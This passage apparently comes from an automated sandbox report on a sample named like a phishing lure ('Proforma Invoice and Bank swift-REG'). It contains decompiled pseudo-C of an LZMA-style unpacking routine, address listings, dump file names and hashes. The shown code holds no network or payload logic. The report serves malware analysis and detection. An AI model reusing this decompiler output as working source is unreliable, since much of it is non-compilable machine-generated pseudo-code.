												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004064ee
0x004064ee
0x004064f2
0x004064ff
0x00406509
0x00000000
0x004064f4
0x004064f4
0x0040652f
0x00406532
0x00406535
0x00406538
0x00406538
0x0040653b
0x00406542
0x00406547
0x00406428
0x0040642b
0x0040679d
0x0040679d
0x0040679d
0x004067a0
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00000000
0x00000000
0x004067ee
0x004067f2
0x004069a1
0x004069b7
0x004069bf
0x004069c6
0x004069c8
0x004069cf
0x004069d3
0x004069d3
0x004067fe
0x00406805
0x0040680d
0x00406810
0x00406813
0x00406813
0x00406819
0x00406819
0x00405fb5
0x00405fb5
0x00405fb5
0x00405fbe
0x00000000
0x00000000
0x00405fc4
0x00000000
0x00405fcf
0x00000000
0x00000000
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe2
0x00000000
0x00000000
0x00405fe8
0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602e
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406034
0x00406039
0x00406039
0x00406042
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00000000
0x00406920
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x0040679d
0x0040679d
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x00000000
0x0040692f
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406131
0x00406133
0x00406136
0x004061a7
0x004061aa
0x004061ad
0x004061b4
0x004061be
0x0040679d
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x0040679d
0x00406138
0x0040613c
0x0040613f
0x00406141
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x00406159
0x0040615d
0x00406164
0x00406167
0x0040616e
0x00406172
0x0040617a
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x0040617e
0x00406181
0x0040619f
0x004061a1
0x00000000
0x00406183
0x00406183
0x00406186
0x00406189
0x0040618c
0x0040618e
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00000000
0x0040619a
0x00000000
0x004063d0
0x004063d4
0x004063f2
0x004063f5
0x004063fc
0x004063ff
0x00406402
0x00406405
0x00406408
0x0040640b
0x0040640d
0x00406414
0x00406415
0x00406417
0x0040641a
0x0040641d
0x00406420
0x00406420
0x00406425
0x00000000
0x00406425
0x004063d6
0x004063d9
0x004063dc
0x004063e6
0x0040679d
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x00000000
0x0040643a
0x0040643e
0x00406461
0x00406464
0x00406467
0x00406471
0x00406440
0x00406440
0x00406443
0x00406446
0x00406449
0x00406456
0x00406459
0x00406459
0x0040679d
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x00000000
0x0040647d
0x00406481
0x00000000
0x00000000
0x00406487
0x0040648b
0x00000000
0x00000000
0x00406491
0x00406493
0x00406497
0x00406497
0x0040649a
0x0040649e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00000000
0x00406977
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x004061ca
0x004061ca
0x004061ce
0x0040693b
0x00000000
0x0040693b
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061e9
0x004061ec
0x004061ef
0x004061ef
0x004061f2
0x004061f5
0x00000000
0x00000000
0x004061fb
0x00406201
0x00000000
0x00000000
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406232
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406265
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x0040626e
0x00406275
0x00406278
0x00000000
0x0040627e
0x00000000
0x0040627e
0x00000000
0x00406283
0x00406283
0x00406287
0x00406947
0x00000000
0x00406947
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
0x004062a2
0x004062a5
0x004062a8
0x004062a8
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f6
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x004062fb
0x00406302
0x00406305
0x00000000
0x00406307
0x00000000
0x00406307
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x0040630c
0x00000000
0x00000000
0x00406347
0x00406347
0x0040634b
0x00406953
0x00000000
0x00406953
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406366
0x00406369
0x0040636c
0x0040636c
0x00406372
0x00406310
0x00406310
0x00406313
0x00000000
0x00406313
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x0040638f
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063ba
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063bf
0x004063c6
0x004063c9
0x00000000
0x004063cb
0x00000000
0x004063cb
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00000000
0x00406983
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406767
0x0040676b
0x0040678d
0x00406790
0x0040679a
0x0040679d
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x0040679d
0x0040676d
0x00406770
0x00406774
0x00406777
0x00406777
0x0040677a
0x00000000
0x00000000
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x0040685b
0x0040685b
0x00000000
0x0040685b
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x00406915
0x00406918
0x00406819
0x00000000
0x00000000
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00406566
0x00406569
0x0040656c
0x0040656e
0x00406570
0x00406570
0x00406571
0x00406574
0x0040657b
0x0040657e
0x0040658c
0x00000000
0x00000000
0x00406862
0x00406862
0x00406865
0x0040686c
0x00000000
0x00000000
0x00406871
0x00406871
0x00406875
0x004069ad
0x00000000
0x004069ad
0x0040687b
0x0040687e
0x00406881
0x00406885
0x00406888
0x0040688e
0x00406890
0x00406890
0x00406890
0x00406893
0x00406896
0x00406896
0x00406896
0x00406896
0x00406899
0x00406899
0x0040689d
0x004068fd
0x00406900
0x00406905
0x00406906
0x00406908
0x0040690a
0x0040690d
0x00406819
0x00406819
0x00000000
0x0040681f
0x00406819
0x0040689f
0x004068a5
0x004068a8
0x004068ab
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068bd
0x004068c0
0x004068d9
0x004068dc
0x004068df
0x004068e2
0x004068e6
0x004068e8
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068ca
0x004068cf
0x004068d1
0x004068d4
0x004068d4
0x004068ef
0x004068f6
0x00000000
0x004068f8
0x00000000
0x004068f8
0x00000000
0x00406594
0x00406597
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x004064df
0x004064df
0x00000000
0x004064df
0x00406760
0x00406995
0x00000000
0x00000000
0x00405fc4
0x004069cc
0x004069cc
0x00000000
0x004069cc
0x00406819
0x004067a0
0x0040679d
0x00000000
0x004064f2

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
Instruction ID: 067b91939e33353516387f96afd3df60e22fb0a2a23546be1218d687de4ca84d
Opcode Fuzzy Hash: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
Instruction Fuzzy Hash: 14715371E00229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7799996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040643A, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040643A() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
